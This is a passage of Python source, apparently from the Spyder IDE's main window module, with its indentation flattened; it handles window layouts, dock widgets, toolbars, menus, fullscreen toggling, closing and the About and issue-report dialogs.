if self.ipyconsole is not None:
if self.ipyconsole.isvisible:
plugins_to_show += [self.extconsole, self.ipyconsole]
else:
plugins_to_show += [self.ipyconsole, self.extconsole]
else:
plugins_to_show += [self.extconsole]
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
ipy_visible = self.ipyconsole is not None and self.ipyconsole.isvisible
if not self.extconsole.isvisible and not ipy_visible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates()
# Show dialog with missing dependencies
self.report_missing_dependencies()
self.is_setting_up = False
def update_window_title(self):
"""Update main spyder window title based on projects."""
title = self.base_title
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), '~')
title = '{0} - {1}'.format(path, title)
self.setWindowTitle(title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify that the saved window position is valid for
# the current screen geometry. See issue 3748
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symmetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symmetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main'):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)  # Restore non-maximized layout
qba = self.saveState()
CONF.set(section, prefix+'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
self.extconsole.setMinimumHeight(250)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section)
CONF.set(section, prefix+'state', None)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section)
self.current_quick_layout = 'default'
CONF.set(section, prefix+'state', None)
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
for plugin in self.widgetlist:
try:
plugin.initialize_plugin_in_mainwindow_layout()
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time"""
self.set_window_settings(*settings)
self.setUpdatesEnabled(False)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(4)
# define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_ext = self.extconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# Layouts are organized by columns; each column is organized by rows.
# Width fractions must add up to 1.0, and the row heights within each
# column must also add up to 1.0.
# Spyder Default Initial Layout
s_layout = {'widgets': [
# column 0
[[explorer_project]],
# column 1
[[editor]],
# column 2
[[outline]],
# column 3
[[help_plugin, explorer_variable, helper, explorer_file,
finder] + plugins,
[console_int, console_ext, console_ipy, history]]
],
'width fraction': [0.0, # column 0 width
0.55, # column 1 width
0.0, # column 2 width
0.45], # column 3 width
'height fraction': [[1.0], # column 0, row heights
[1.0], # column 1, row heights
[1.0], # column 2, row heights
[0.46, 0.54]], # column 3, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
r_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_ext, console_int]],
# column 1
[[explorer_variable, history, outline, finder] + plugins,
[explorer_file, explorer_project, help_plugin, helper]]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Matlab
m_layout = {'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_ext, console_int]],
# column 2
[[explorer_variable, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [0.20, # column 0 width
0.40, # column 1 width
0.40], # column 2 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45], # column 1, row heights
[0.55, 0.45]], # column 2, row heights
'hidden widgets': [],
'hidden toolbars': [],
}
# Vertically split
v_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_ext, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [1.0], # column 0 width
'height fraction': [[0.55, 0.45]], # column 0, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Horizontally split
h_layout = {'widgets': [
# column 0
[[editor]],
# column 1
[[console_ipy, console_ext, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[1.0], # column 0, row heights
[1.0]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': []
}
# Layout selection
layouts = {'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout}
layout = layouts[index]
widgets_layout = layout['widgets']
widgets = []
for column in widgets_layout:
for row in column:
for widget in row:
if widget is not None:
widgets.append(widget)
# Make every widget visible
for widget in widgets:
widget.toggle_view(True)
action = widget.toggle_view_action
try:
action.setChecked(widget.dockwidget.isVisible())
except AttributeError:
pass
# Set the widgets horizontally
for i in range(len(widgets) - 1):
first, second = widgets[i], widgets[i+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
Qt.Horizontal)
# Arrange rows vertically
for column in widgets_layout:
for i in range(len(column) - 1):
first_row, second_row = column[i], column[i+1]
if first_row is not None and second_row is not None:
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout:
for row in column:
for i in range(len(row) - 1):
first, second = row[i], row[i+1]
if first is not None and second is not None:
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = global_hidden_widgets + layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
# set the width and height
self._layout_widget_info = []
width, height = self.window_size.width(), self.window_size.height()
# fix column width
# for c in range(len(widgets_layout)):
# widget = widgets_layout[c][0][0].dockwidget
# min_width, max_width = widget.minimumWidth(), widget.maximumWidth()
# info = {'widget': widget,
# 'min width': min_width,
# 'max width': max_width}
# self._layout_widget_info.append(info)
# new_width = int(layout['width fraction'][c] * width * 0.95)
# widget.setMinimumWidth(new_width)
# widget.setMaximumWidth(new_width)
# widget.updateGeometry()
# print(c, widgets_layout[c][0][0], new_width)
# fix column height
for c, column in enumerate(widgets_layout):
for r in range(len(column) - 1):
widget = column[r][0]
dockwidget = widget.dockwidget
dock_min_h = dockwidget.minimumHeight()
dock_max_h = dockwidget.maximumHeight()
info = {'widget': widget,
'dock min height': dock_min_h,
'dock max height': dock_max_h}
self._layout_widget_info.append(info)
# The 0.95 factor adjusts the height based on the useful estimated
# area of the window
new_height = int(layout['height fraction'][c][r]*height*0.95)
dockwidget.setMinimumHeight(new_height)
dockwidget.setMaximumHeight(new_height)
self._custom_layout_timer = QTimer(self)
self._custom_layout_timer.timeout.connect(self.layout_fix_timer)
self._custom_layout_timer.setSingleShot(True)
self._custom_layout_timer.start(5000)
def layout_fix_timer(self):
"""Fixes the height of docks after a new layout is set."""
info = self._layout_widget_info
for i in info:
dockwidget = i['widget'].dockwidget
if 'dock min width' in i:
dockwidget.setMinimumWidth(i['dock min width'])
dockwidget.setMaximumWidth(i['dock max width'])
if 'dock min height' in i:
dockwidget.setMinimumHeight(i['dock min height'])
dockwidget.setMaximumHeight(i['dock max height'])
dockwidget.updateGeometry()
self.setUpdatesEnabled(True)
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
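# Worked example of the cycling above (added comment, not executed): with
# names == order == ['custom A', 'custom B'] and active == ['custom B'],
# layout_index becomes ['default', 1]. Starting from 'default' (position 0),
# 'next' yields (0 + 1) % 2 == 1, so quick_layout_switch(1) loads
# 'custom B'; 'previous' wraps around the same list in the other direction.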
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The default layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
# Now deal with Python shell and IPython plugins
if self.ipyconsole is not None:
focus_client = self.ipyconsole.get_focus_client()
if focus_client is not None:
self.last_console_plugin_focus_was_python = False
else:
shell = get_focus_python_shell()
if shell is not None:
self.last_console_plugin_focus_was_python = True
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import ShellBaseWidget
from spyder.widgets.editor import TextEditBaseWidget
from spyder.widgets.ipythonconsole import ControlWidget
# if focused widget isn't valid try the last focused
if not isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
widget = self.previous_focused_widget
textedit_properties = None
if isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
console = isinstance(widget, (ShellBaseWidget, ControlWidget))
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if not console and not_readonly and not self.editor.is_file_opened():
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
if self.menuBar().hasFocus():
return
widget, textedit_properties = self.get_focus_widget_properties()
for action in self.editor.search_menu_actions:
try:
action.setEnabled(self.editor.isAncestorOf(widget))
except RuntimeError:
pass
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
_x, _y, readwrite_editor = textedit_properties
# Disable the replace action for read-only files
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'console', 'ipython_console', 'variable_explorer',
'help', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console']
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
self.debug_print(message)
self.splash.show()
self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.black))
QApplication.processEvents()
def remove_tmpdir(self):
"""Remove Spyder temporary directory"""
shutil.rmtree(programs.TEMPDIR, ignore_errors=True)
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
for plugin in self.widgetlist:
if plugin.isAncestorOf(self.last_focused_widget):
plugin.visibility_changed(True)
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
if CONF.get('main', 'single_instance'):
self.open_files_server.close()
for plugin in self.thirdparty_plugins:
if not plugin.closing_plugin(cancelable):
return False
for widget in self.widgetlist:
if not widget.closing_plugin(cancelable):
return False
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.already_closed = True
return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in self.widgetlist:
if plugin.isAncestorOf(widget):
plugin.dockwidget.hide()
break
def toggle_lock_dockwidgets(self, value):
"""Lock/Unlock dockwidgets"""
self.dockwidgets_locked = value
self.apply_panes_settings()
CONF.set('main', 'panes_locked', value)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# No plugin is currently maximized: maximizing focus plugin
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in self.widgetlist:
plugin.dockwidget.hide()
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
self.setCentralWidget(self.last_plugin)
self.last_plugin.ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
self.last_plugin.show()
self.last_plugin.visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
self.last_plugin.ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.isFullScreen():
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.isFullScreen():
self.fullscreen_flag = False
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def about(self):
"""About Spyder"""
versions = get_versions()
# Show git revision for development version
revlink = ''
if versions['revision']:
rev = versions['revision']
revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
"commit/%s'>Commit: %s</a>)" % (rev, rev)
QMessageBox.about(self,
_("About %s") % "Spyder",
"""<b>Spyder %s</b> %s
<br>The Scientific PYthon Development EnviRonment
<br>Copyright © The Spyder Project Contributors
<br>Licensed under the terms of the MIT License
<p>Created by Pierre Raybaut.
<br>Developed and maintained by the
<a href="%s/blob/master/AUTHORS">Spyder Project Contributors</a>.
<br>Many thanks to all the Spyder beta testers and regular users.
<p>For bug reports and feature requests, please go
to our <a href="%s">Github website</a>. For discussions around the
project, please go to our <a href="%s">Google Group</a>
<p>This project is part of a larger effort to promote and
facilitate the use of Python for scientific and engineering
software development. The popular Python distributions
<a href="http://continuum.io/downloads">Anaconda</a>,
<a href="https://winpython.github.io/">WinPython</a> and
<a href="http://python-xy.github.io/">Python(x,y)</a>
also contribute to this plan.
<p>Python %s %dbits, Qt %s, %s %s on %s
<p><small>Most of the icons for the Spyder 2 theme come from the Crystal
Project (© 2006-2007 Everaldo Coelho). Other icons for that
theme come from <a href="http://p.yusukekamiyamane.com/"> Yusuke
Kamiyamane</a> (all rights reserved) and from
<a href="http://www.oxygen-icons.org/">
The Oxygen icon theme</a></small>.
"""
% (versions['spyder'], revlink, __project_url__,
__project_url__, __forum_url__, versions['python'],
versions['bitness'], versions['qt'], versions['qt_api'],
versions['qt_api_ver'], versions['system']))
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(None)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.show()
dlg.exec_()
@Slot()
def report_issue(self):
if PY3:
from urllib.parse import quote
else:
from urllib import quote # analysis:ignore
versions = get_versions()
# Get git revision for development version
revision = ''
if versions['revision']:
revision = versions['revision']
issue_template = """\
## Description
**What steps will reproduce the problem?**
1.
2.
3.
**What is the expected output? What do you see instead?**
**Please provide any additional information below**
## Version and main components
* Spyder Version: %s %s
* Python Version: %s
* Qt Versions: %s, %s %s on %s
## Dependencies
```
%s
```
""" % (versions['spyder'],
revision,
versions['python'],
versions['qt'],
versions['qt_api'],
versions['qt_api_ver'],
versions['system'],
dependencies.status())
url = QUrl("https://github.com/spyder-ide/spyder/issues/new")
if PYQT5:
